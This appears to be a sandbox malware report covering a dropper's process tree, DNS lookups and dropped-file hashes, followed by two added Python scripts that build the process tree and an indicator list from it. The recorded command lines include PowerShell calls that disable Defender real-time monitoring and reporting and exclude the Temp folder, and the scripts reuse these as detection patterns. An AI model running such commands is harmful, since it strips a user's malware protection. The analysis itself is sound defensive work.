PID 4620 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4620 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe
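Added example, not code from the report or from any tool it names: a Python script that rebuilds the behavioral2 process tree from the "Suspicious use of WriteProcessMemory" rows above (the root sample spawns setup_install.exe, which spawns one cmd.exe per stage, two of which run powershell.exe) and tags the command lines in the Processes list that turn off Defender real-time protection and cloud reporting, add an exclusion for the drop directory, or launch a dropped Tue12*.exe stage through cmd.exe /c. The row data is rebuilt from the report's own entries (each child is listed three times there, so the parser collapses repeats); the image-path regex assumes paths without spaces, which holds for every row in this report, and the tag names are this example's own.

```python
"""Rebuild a sandbox process tree and flag Defender tampering (added example)."""
import re
from collections import defaultdict

SETUP = r"C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
ROOT = r"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"


def _row(parent, child, parent_img, child_img):
    return f"PID {parent} wrote to memory of {child} N/A {parent_img} {child_img}"


# Constructed sample: the report's "Suspicious use of WriteProcessMemory" rows,
# rebuilt in the report's own format (each child appears three times there).
WPM_LINES = (
    [_row(4408, 4620, ROOT, SETUP)] * 3
    + [_row(4620, 5112, SETUP, CMD)] * 3
    + [_row(4620, 8, SETUP, CMD)] * 3
    + [_row(8, 1488, CMD, PS)] * 3
    + [_row(5112, 3088, CMD, PS)] * 3
    + [_row(4620, pid, SETUP, CMD) for pid in
       (628, 1304, 4672, 2496, 1740, 2184, 5044, 4896, 2652, 1960, 3128, 2036, 1200, 3764, 3832)]
)

# Constructed sample: command lines copied from the report's "Processes" list.
CMDLINES = [
    r"C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable",
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r"C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe",
    r"C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo",
]

# Assumption: image paths contain no spaces (true for every row in this report).
WPM_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_wpm(lines):
    """Return (parent_of, image_of) from WriteProcessMemory rows; repeated rows collapse."""
    parent_of, image_of = {}, {}
    for line in lines:
        m = WPM_RE.match(line)
        if not m:
            continue
        parent, child, parent_img, child_img = m.groups()
        parent_of[int(child)] = int(parent)
        image_of[int(parent)] = parent_img
        image_of[int(child)] = child_img
    return parent_of, image_of


def build_tree(parent_of):
    """Return (roots, children): a root is a parent that was never itself written to."""
    children = defaultdict(list)
    for child, parent in parent_of.items():
        children[parent].append(child)
    roots = sorted(p for p in children if p not in parent_of)
    return roots, {p: sorted(c) for p, c in children.items()}


def render(pid, children, image_of, depth=0):
    """Indented 'pid basename' lines, depth-first, children in PID order."""
    name = image_of[pid].rsplit("\\", 1)[-1]
    lines = [f"{'  ' * depth}{pid} {name}"]
    for child in children.get(pid, []):
        lines.extend(render(child, children, image_of, depth + 1))
    return lines


# Defender tampering seen in this report: real-time protection off, cloud
# reporting and sample submission off, and an exclusion for the drop directory.
TAMPER_RULES = {
    "defender_realtime_off": re.compile(r"Set-MpPreference.*-DisableRealtimeMonitoring\s+\$true", re.I),
    "defender_cloud_off": re.compile(r"-MAPSReporting\s+Disable|-SubmitSamplesConsent\s+NeverSend", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference.*-ExclusionPath", re.I),
}
# "cmd.exe /c <stage>.exe": the launcher pattern used for every Tue12*.exe here.
STAGE_RE = re.compile(r"cmd\.exe\s+/c\s+(\S+\.exe)\b", re.I)


def classify(cmdline):
    """Tags for one command line; an empty list means nothing of interest."""
    tags = [name for name, rx in TAMPER_RULES.items() if rx.search(cmdline)]
    m = STAGE_RE.search(cmdline)
    if m:
        tags.append("stage_launch:" + m.group(1))
    return tags


if __name__ == "__main__":
    parent_of, image_of = parse_wpm(WPM_LINES)
    roots, children = build_tree(parent_of)
    for root in roots:
        print("\n".join(render(root, children, image_of)))
    for cl in CMDLINES:
        print(classify(cl), cl[:70])
```

The same rules apply unchanged to Sysmon Event ID 1 or Windows 4688 records, where the parent/child pair comes from ParentProcessId/ProcessId instead of the WriteProcessMemory rows; the point of keying on Set-MpPreference and Add-MpPreference arguments rather than on powershell.exe itself is that the launcher here is an ordinary cmd.exe /c, so process-name rules alone would not separate it from benign scripting.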

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe

MD5 653f5bbaac95d546bb4c5c7557b25c22
SHA1 346e064735ca5abe0963288dd342d7ea058bb61a
SHA256 d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12
SHA512 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/4620-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4620-73-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4620-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-72-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4620-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3088-74-0x0000000073DDE000-0x0000000073DDF000-memory.dmp

memory/4620-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-66-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-64-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4620-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1488-75-0x0000000073DD0000-0x0000000074580000-memory.dmp

memory/4620-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12d6c3a590f5c.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue121e696b2d94fe.exe

MD5 7d7f14a1b3b8ee4e148e82b9c2f28aed
SHA1 649a29887915908dfba6bbcdaed2108511776b5a
SHA256 623a56a34174f3dcb179796205294124918996ccc8b56062b419ab8354df35cb
SHA512 585dda13cda86d077d28cdfbe799d4356967394e09a17e3ce406f557d14ec24f6b6cbdf0a7b2beaaae8743b2c545b898a12eeeeb56579b8fa560202a290370d3

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue129ba086d712.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12f72da5484b.exe

MD5 7b253e0725b69672ef3d44d524de2c4c
SHA1 f3c0d9f5f984ee5d7578eeabded495094cec1031
SHA256 8b6540b22cc0be302f5c1e71de5d436a4036af18a55a0e4f185d0aaec6756d5c
SHA512 24c5808384fdb0ab8fe0b8b9e6a7fef6db39071c655f7dc6399aedf24d1e005a67e5285f752be29966de9078e47cf97427c67473fb88e0e78280b3d578a5e774

memory/4620-93-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1488-91-0x00000000051D0000-0x0000000005206000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue122eaa5d903b51f3.exe

MD5 b33a3fb6b491b328dacaf18c302b20de
SHA1 41281e81ec9ba49af4af18f3c61038e62818d3c6
SHA256 088d635941437ab637abea3d698c71dedf0f24d5dffd62f6b1fe4329b8e7de72
SHA512 a247cf6aa60d3cbacc46242a51793c6a6e3a3c00c1276af6b59d6b60ffb40d7915b09a9169a521f4326ecc622be29e71fb4cbe705f52e4e28e5d5802630b793e

memory/1488-104-0x0000000073DD0000-0x0000000074580000-memory.dmp

memory/1488-103-0x0000000073DD0000-0x0000000074580000-memory.dmp

memory/4620-102-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4620-101-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3088-106-0x00000000055B0000-0x0000000005616000-memory.dmp

memory/3088-107-0x0000000005690000-0x00000000056F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igrty1qm.ehu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3088-127-0x00000000064D0000-0x00000000064EE000-memory.dmp

memory/3088-108-0x0000000005ED0000-0x0000000006224000-memory.dmp

memory/3088-128-0x0000000006A30000-0x0000000006A7C000-memory.dmp

memory/3088-105-0x00000000053F0000-0x0000000005412000-memory.dmp

memory/4620-100-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4620-99-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4620-97-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1488-92-0x00000000058C0000-0x0000000005EE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue123e8bf9beda40e5.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue127ff3b5477.exe

MD5 cd6d011a663a12f81ba8e4e5407e3a6f
SHA1 53c81876f0ff422d41f19c6d2ea0d30548e4e071
SHA256 c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1
SHA512 8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue125fd9410f80dd6.exe

MD5 1fd5c6ee4e5c6af11015087d8d6af3b0
SHA1 21aef092eb546d508740185e38b52896fb6aea5d
SHA256 d41f88572be0063290efe714d45528ba9d467ac89e066d88f13e13a7325bc663
SHA512 5074aafa3d7030713940aa9436b1c96fdef2e7df52c68f5d97203fe0ec3af7055934e6b6cac5ba95c69310e037863b16759b1f475c4e42ab61e9acb7ed387975

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue1264f7b252.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue1239d4b60d.exe

MD5 343befc915e3428791029f5f314393b9
SHA1 47701bb5f2f8b6c5135abccec790378c3986f555
SHA256 4ca6bf1db2cb7f2f8799180ee8a56c2d96f718484a4ee3e06e32aebe6897c1da
SHA512 9381340ccad3ac5ce239908b3f90cd32ee1b835510d8ecc17b72049a49bb6613ed246d955d0a65f4970735f8cabcfd9af93417034a405d00ef193975cd1b2e5e

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12b505de68357.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue127d1be88dd70f8.exe

MD5 3476b903e6e6ff5f246460e8749fd232
SHA1 3639e6c1f104ad7aa24ab7f72aca5dad686361cf
SHA256 25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002
SHA512 ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12536443c2c8.exe

MD5 3bb8763cc667a751d1653cc3634f1f83
SHA1 d2e0dc47a6085864ec65ec0fa326b4434bd7f376
SHA256 f369798e25e4c2dd109caf27fb399d2f32200e07a5550fdb48816daaa5563843
SHA512 1c5800e5b80775f33ad55a13418c039b3c56b8e532ccf8d5895c5a4e904731f76104ff6469075d093f39c902364bb8c19d048a3a4aa6b2893e03ebc4e41f160e

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue12b645e6648.exe

MD5 8268aa1cba3763a79c3dd333ab42c093
SHA1 e7d034e6f55bc07b38ad50f5bb2e83f098c60c97
SHA256 7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f
SHA512 271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue120ba2d3df.exe

MD5 5cd1e88d510f00080fecc9d52fb97ba3
SHA1 c2d8521c2ec33026df1f07a0214b422ce12f702d
SHA256 f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470
SHA512 d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195

memory/1488-141-0x0000000070FE0000-0x000000007102C000-memory.dmp

memory/3088-140-0x0000000006A10000-0x0000000006A2E000-memory.dmp

memory/3088-130-0x0000000070FE0000-0x000000007102C000-memory.dmp

memory/3088-151-0x00000000074A0000-0x0000000007543000-memory.dmp

memory/3088-129-0x0000000006AA0000-0x0000000006AD2000-memory.dmp

memory/3088-153-0x00000000077F0000-0x000000000780A000-memory.dmp

memory/3088-152-0x0000000007E40000-0x00000000084BA000-memory.dmp

memory/3088-154-0x0000000007870000-0x000000000787A000-memory.dmp

memory/1488-155-0x0000000007D30000-0x0000000007DC6000-memory.dmp

memory/3088-156-0x00000000079F0000-0x0000000007A01000-memory.dmp

memory/1488-157-0x0000000007CF0000-0x0000000007CFE000-memory.dmp

memory/1488-158-0x0000000007D00000-0x0000000007D14000-memory.dmp

memory/1488-159-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

memory/1488-160-0x0000000007DE0000-0x0000000007DE8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bc8c31ff0a9d481b9101d28bb442ecdc
SHA1 35af27ec03d74f3386e7ca6a02cfe7f6c14ebe36
SHA256 822cd0e571e27ca900d378f9bea491c57906c39bbd83a220eefb366e31b80443
SHA512 4b61815dcfd2604fa1885d73a24c9a63344c5112aa27e4bb2b7aef08f01608d4af85b7bcdec814b70ad037a89b94dd398f7af84fda5c80e6266346f61d0e5158

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/1488-166-0x0000000073DD0000-0x0000000074580000-memory.dmp
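Added example, not from the report: a parser for the Files listings above that turns each path with its MD5/SHA1/SHA256/SHA512 lines into a record, checks that every hash has the expected hex length, drops files the host itself writes when PowerShell runs (__PSScriptPolicyTest_*.ps1, the CLR UsageLogs log, StartupProfileData, the jump-list temp file under Recent\CustomDestinations), whose hashes are machine-specific rather than sample-specific, and groups the rest by SHA256 so that a payload dropped under two different 7zS* directories (Tue120ba2d3df.exe appears under 7zSC5B35246 and 7zS831F6CB7 with the same hashes) yields one indicator. The embedded excerpt is copied from this report; the list of host-artifact patterns is this example's own assumption.

```python
"""Turn a sandbox report's Files section into a de-duplicated IOC list (added example)."""
import re
from collections import defaultdict

# Constructed sample: excerpts copied from this report's Files sections, in the
# report's own layout (path, blank line, four hash lines; memory dumps in between).
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe

MD5 5cd1e88d510f00080fecc9d52fb97ba3
SHA1 c2d8521c2ec33026df1f07a0214b422ce12f702d
SHA256 f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470
SHA512 d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195

memory/1416-197-0x0000000000D40000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\setup_install.exe

MD5 653f5bbaac95d546bb4c5c7557b25c22
SHA1 346e064735ca5abe0963288dd342d7ea058bb61a
SHA256 d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12
SHA512 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446

memory/4620-93-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igrty1qm.ehu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zS831F6CB7\Tue120ba2d3df.exe

MD5 5cd1e88d510f00080fecc9d52fb97ba3
SHA1 c2d8521c2ec33026df1f07a0214b422ce12f702d
SHA256 f22839eb0904705653bdfcd8c144867c3c02ab09096614652280d4d1c323e470
SHA512 d2207c819f028843b416e857e9dc47fa3b553f5c9955bf0ffc6dbb6e05e75cc85b5b133cc86c373182dc00f16111b6d51cfd67698c9a699ae866497ddc75a195
"""

PATH_RE = re.compile(r"^[A-Za-z]:\\")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")
MEMDUMP_RE = re.compile(r"^memory/(\d+)-\d+-0x[0-9A-Fa-f]+-0x[0-9A-Fa-f]+-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Assumption: these paths are written by PowerShell/.NET/the shell on any host,
# so their hashes describe the sandbox machine, not the sample.
NOISE_RE = re.compile(
    r"__PSScriptPolicyTest_|\\CLR_v4\.0_32\\UsageLogs\\|StartupProfileData-|\\Recent\\CustomDestinations\\",
    re.I,
)


def parse_files(text):
    """Return (records, memory_dump_pids); a record is {'path', 'MD5', 'SHA1', ...}."""
    records, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
            continue
        h = HASH_RE.match(line)
        if h and current is not None:
            current[h.group(1)] = h.group(2).lower()
            continue
        d = MEMDUMP_RE.match(line)
        if d:
            dumps.append(int(d.group(1)))
    return records, dumps


def validate(record):
    """True when all four hashes are present with the expected hex length."""
    return all(len(record.get(k, "")) == n for k, n in HASH_LEN.items())


def ioc_records(records):
    """Keep well-formed records for dropped payloads; drop host-generated artifacts."""
    return [r for r in records if validate(r) and not NOISE_RE.search(r["path"])]


def group_by_sha256(records):
    """sha256 -> sorted unique paths (one payload may land under several 7zS* dirs)."""
    groups = defaultdict(set)
    for r in records:
        groups[r["SHA256"]].add(r["path"])
    return {h: sorted(p) for h, p in groups.items()}


def ioc_csv(records):
    """One line per unique SHA256: sha256,md5,sha1,filename(s)."""
    lines = []
    for sha256, paths in sorted(group_by_sha256(records).items()):
        r = next(x for x in records if x["SHA256"] == sha256)
        names = "|".join(sorted({p.rsplit("\\", 1)[-1] for p in paths}))
        lines.append(f"{sha256},{r['MD5']},{r['SHA1']},{names}")
    return lines


if __name__ == "__main__":
    recs, dump_pids = parse_files(REPORT_EXCERPT)
    print("\n".join(ioc_csv(ioc_records(recs))))
    print("memory dumps from PIDs:", sorted(set(dump_pids)))
```

Feeding the full report text in place of the excerpt gives one row per distinct dropped file across both detonations; the memory-dump PIDs are returned separately because those entries carry no hashes and their addresses are only meaningful inside the run that produced them.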